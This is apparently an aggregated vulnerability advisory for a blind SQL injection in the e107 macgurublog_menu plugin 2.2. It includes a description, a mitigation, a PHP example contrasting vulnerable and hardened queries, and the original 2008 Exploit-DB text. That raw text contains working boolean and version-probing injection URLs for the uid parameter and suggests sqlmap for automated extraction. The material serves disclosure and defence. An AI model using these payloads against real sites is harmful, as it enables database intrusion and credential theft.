Vendor: macgurublog_menu
By: Virangar Security Team
CVSS: 9 (HIGH)
Type: Blind SQL Injection
CWE: 89
Product Name: macgurublog_menu
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: NO
Related CWE: N/A
CPE: e107:macgurublog_menu:2.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

e107 Plugin BLOG Engine v2.2 (macgurublog.php/uid) Blind SQL Injection Vulnerability

The vulnerability exists in the macgurublog.php file, where the uid request parameter is concatenated, without sanitization, into the user_id condition of a SQL query. An attacker can exploit this by sending a specially crafted HTTP request whose uid value carries additional SQL. Because the page's response differs depending on whether the injected condition is true or false (blind injection), an attacker can extract sensitive information from the database, such as user credentials, one comparison at a time.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner. Additionally, parameterized queries should be used to prevent SQL injection attacks.
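The following is an added example, not code from e107 or the macgurublog_menu plugin: it places the concatenation pattern quoted in the advisory beside two hardened variants (strict integer validation, and a parameterized query). The `FakeDb` class is an assumed stand-in that only returns the SQL text e107's `db_Select()` would run, so the snippet works offline.

```php
<?php
// Assumed stand-in for e107's $sql object: builds the statement text instead of
// executing it, so the effect of each input is visible without a database.
class FakeDb {
    public function db_Select($table, $fields, $where) {
        return "SELECT $fields FROM $table WHERE $where";
    }
}

// Vulnerable pattern (lines 18/31 of the advisory): raw $_GET['uid'] is glued
// onto the WHERE clause, so any SQL in uid becomes part of the query.
function lookupUserVulnerable(FakeDb $sql, array $get) {
    $buid = $get['uid'];
    return $sql->db_Select("user", "user_name", "user_id=" . $buid);
}

// Hardened 1: uid is a numeric id, so reject anything that is not a string of
// digits before it reaches the query. ctype_digit() on the raw string is used
// rather than a bare (int) cast, which would silently accept "1 and 2>1/*".
function lookupUserHardened(FakeDb $sql, array $get) {
    if (!isset($get['uid']) || !ctype_digit($get['uid'])) {
        return null; // caller should answer with a generic error, not the query
    }
    return $sql->db_Select("user", "user_name", "user_id=" . (int) $get['uid']);
}

// Hardened 2: parameterized query. Needs a live PDO connection, so it is
// defined but not called below; the bound value can never alter the SQL.
function lookupUserPrepared(PDO $pdo, int $uid) {
    $stmt = $pdo->prepare("SELECT user_name FROM user WHERE user_id = :uid");
    $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchColumn();
}

// Constructed inputs: a normal request and the boolean probe from the advisory.
$sql    = new FakeDb();
$benign = ['uid' => '1'];
$probe  = ['uid' => '1 and 2>1/*'];

echo "vulnerable, probe:  ", lookupUserVulnerable($sql, $probe), "\n";
echo "hardened, probe:    ", var_export(lookupUserHardened($sql, $probe), true), "\n";
echo "hardened, benign:   ", lookupUserHardened($sql, $benign), "\n";
```

Running it shows the probe's condition becoming part of the vulnerable query while the hardened version refuses the same input before any query is built.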

Exploit-DB raw data:

##################################################################################################
#                                                                                                #
# ::e107 Plugin BLOG Engine v2.2 (macgurublog.php/uid) Blind SQL Injection Vulnerability::       #
#                                                                                                #
##################################################################################################

Virangar Security Team

www.virangar.net

--------
Discovered by: virangar security team (hadihadi)

special thanks to: MR.nosrati, black.shadowes, MR.hesy, Zahra

& all virangar members & all hackerz

greetz: to my best friend in the world hadi_aryaie2004
& my lovely friend arash (imm02tal)

-------vuln codes in:-----------
macgurublog.php:
line 18:$buid = $_GET['uid'];
..
..
line 31:$sql -> db_Select("user", "user_name", "user_id=".$buid);
---
exploit:
[-]note=because e107 uses different prefix/table names it's impossible to write an exploit for it :(

http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and 2>1/*   #the page fully loaded

http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and 1>3/*   #page loaded without any data and some error that says "The user has hidden their blog."

checking the mysql version:
http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and substring(@@version,1,1)=5
or
http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and substring(@@version,1,1)=4

# you can exploit the bug with automatic blind sql tools such as sqlmap or ...
---
young iranian h4ck3rz

# milw0rm.com [2008-05-22]